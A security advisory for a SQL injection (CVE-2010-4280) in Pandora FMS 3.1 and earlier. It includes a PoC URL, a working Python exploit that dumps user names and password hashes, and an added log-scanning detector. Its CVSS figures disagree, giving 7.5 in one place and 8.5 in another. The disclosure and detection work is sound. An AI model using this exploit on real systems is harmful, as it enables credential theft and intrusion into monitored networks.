Pandora FMS <= 3.1 SQL Injection

2010.12.05
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[+] Introduction

Pandora FMS (Pandora Flexible Monitoring System) is a software solution for monitoring computer networks. It allows monitoring, in a visual way, the status and performance of several parameters from different operating systems, servers, applications and hardware systems such as firewalls, proxies, databases, web servers or routers. It can be deployed on almost any operating system. It features remote monitoring (WMI, SNMP, TCP, UDP, ICMP, HTTP...) and it can also use agents; an agent is available for each platform. It can also monitor hardware systems with a TCP/IP stack, such as load balancers, routers, network switches, printers or firewalls. This software has several servers that process and get information from different sources: a WMI server for gathering remote Windows information, a predictive server, a plug-in server which runs complex user-defined network tests, an advanced export server to replicate data between different sites of Pandora FMS, a network discovery server, and an SNMP trap console. Released under the terms of the GNU General Public License, Pandora FMS is free software.

3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10

The parameter id_group is vulnerable to SQL injection when get_agents_group_json is equal to 1.

PoC:
http://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario

Exploit:

# Pandora Flexible Monitoring System SQL Injection PoC
# Juan Galiana Lara
# Gets the list of users and passwords from the database
#
# configure cookie & host before using it
# usage:
# python sqlinj_users.py
# admin:75b756ff2785ea8bb9ae02c13b6a71f1
# ...

import json
import urllib2

headers = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"}
url = "http://HOST/pandora_console/ajax.php"
url += "?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1"
url += "/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario"
req = urllib2.Request(url, headers=headers)
resp = urllib2.urlopen(req)
users = json.loads(resp.read())  # the UNIONed columns come back under the agent JSON keys
for user in users:
    print(user["id_agente"] + ":" + user["nombre"])

The fix for this kind of issue was the implementation of a generic filter against SQL injection. A proper fix is planned for a major version.

[+] Impact

An attacker can execute operating system commands, inject remote code in the context of the application, get arbitrary files from the filesystem or extract any data from the database, including passwords and confidential information about the monitored network/systems. It is also possible to bypass authentication or escalate privileges to become admin, gaining full control of the web application and web server. These vulnerabilities have a high impact on the confidentiality, integrity and availability of the system.
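For defenders reviewing web-server logs for the endpoint above, the following detection is an added example written for this page (not part of the advisory or of Pandora FMS): it parses constructed Common Log Format lines, decodes the query string, strips the /**/ comments the PoC uses in place of spaces, and flags any get_agents_group_json=1 request whose id_group is not a plain integer.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory); the query strings
# mirror the vulnerable ajax.php endpoint described above.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Dec/2010:10:01:02 +0100] "GET /pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1 HTTP/1.1" 200 512
10.0.0.9 - - [05/Dec/2010:10:01:07 +0100] "GET /pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario HTTP/1.1" 200 2048
10.0.0.9 - - [05/Dec/2010:10:01:09 +0100] "GET /pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1%2F%2A%2A%2Fand%2F%2A%2A%2F1%3D0 HTTP/1.1" 200 2048
10.0.0.7 - - [05/Dec/2010:10:02:00 +0100] "GET /pandora_console/index.php?sec=estado HTTP/1.1" 200 9000
"""

# Common Log Format: client, timestamp, request line, status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SQL_WORDS = re.compile(r'\b(union|select|from|and|or)\b', re.I)

def normalise(value):
    """Replace MySQL /**/ comments (used by the PoC instead of spaces) with spaces."""
    return re.sub(r'/\*.*?\*/', ' ', value).strip()

def classify(line):
    """Return a finding dict for an ajax.php agent-group request whose id_group
    is not a plain integer; return None for anything else."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.endswith('/pandora_console/ajax.php'):
        return None
    qs = parse_qs(parts.query)  # parse_qs also percent-decodes the values
    if qs.get('get_agents_group_json', [''])[0] != '1':
        return None
    id_group = normalise(qs.get('id_group', [''])[0])
    if id_group.isdigit():
        return None  # the only legitimate shape for a group id
    words = sorted({w.lower() for w in SQL_WORDS.findall(id_group)})
    return {'ip': m.group('ip'), 'ts': m.group('ts'),
            'id_group': id_group, 'sql_words': words}

def scan(log_text):
    """Run classify() over every line and collect the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} id_group={f['id_group']!r} words={f['sql_words']}")
```

Because the check keys on the parameter's shape rather than on a keyword list, it also catches variants that percent-encode or comment-obfuscate the payload, as the third sample line shows.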
[+] Systems affected

Versions prior to and including 3.1 of Pandora FMS are affected.

[+] Solution

Apply the security fix for version 3.1:
http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download

Or upgrade to version 3.1.1 from:
http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/

[+] Timeline

Aug 2010: First contact with vendor
Aug 2010: Confirmation from vendor
Sept 2010: Second contact: SQL Injection vulnerabilities
Sept 2010: Confirmation that the fix will be released in October
Oct 2010: PandoraFMS security patch for version 3.1 released
Oct 2010: Request for CVE numbers
Nov 2010: PandoraFMS version 3.1.1 released
Nov 2010: Disclosure of this advisory

[+] References

Official PandoraFMS site: http://pandorafms.org/
SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
Common Vulnerability Scoring System (CVSS) v2 calculator: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/

[+] Credits

These vulnerabilities have been discovered by Juan Galiana Lara - @jgaliana - http://juangaliana.blogspot.com/

References:

http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
http://www.securityfocus.com/bid/45112
http://www.securityfocus.com/archive/1/archive/1/514939/100/0/threaded
http://www.exploit-db.com/exploits/15642
http://www.exploit-db.com/exploits/15641
Copyright 2024, cxsecurity.com